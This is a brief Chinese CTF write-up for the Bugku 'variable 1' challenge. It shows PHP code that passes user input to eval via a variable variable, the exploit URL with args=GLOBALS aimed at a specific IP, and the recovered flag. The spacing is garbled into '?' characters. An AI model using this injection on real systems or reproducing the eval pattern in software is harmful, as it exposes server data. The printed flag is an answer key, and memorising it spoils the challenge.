flag In the variable !?<?php ?
error_reporting(0);// 關(guān)閉php錯(cuò)誤顯示
include?"flag1.php";// 引入flag1.php文件代碼
highlight_file(__file__);
if(isset($_GET['args'])){// 通過(guò)get方式傳遞 args變量才能執(zhí)行if里面的代碼
????$args?=?$_GET['args'];
????if(!preg_match("/^\w+$/",$args)){// 這個(gè)正則表達(dá)式的意思是匹配任意 [A-Za-z0-9_] 的字符，就是任意大小寫字母和0到9以及下劃線組成
????????die("args?error!");
????}
????eval("var_dump($$args);");// 這邊告訴我們這題是代碼審計(jì)的題目
}
?>

所以我們就測(cè)試php的全局變量，將其變量名傳入，經(jīng)測(cè)試，傳入GLOBALS,可以得到flag值

http://123.206.87.240:8004/index1.php?args=GLOBALS

故：flag{92853051ab894a64f7865cf3c2128b34}

?

?

?

?

?

?

?

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的bugku变量1的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。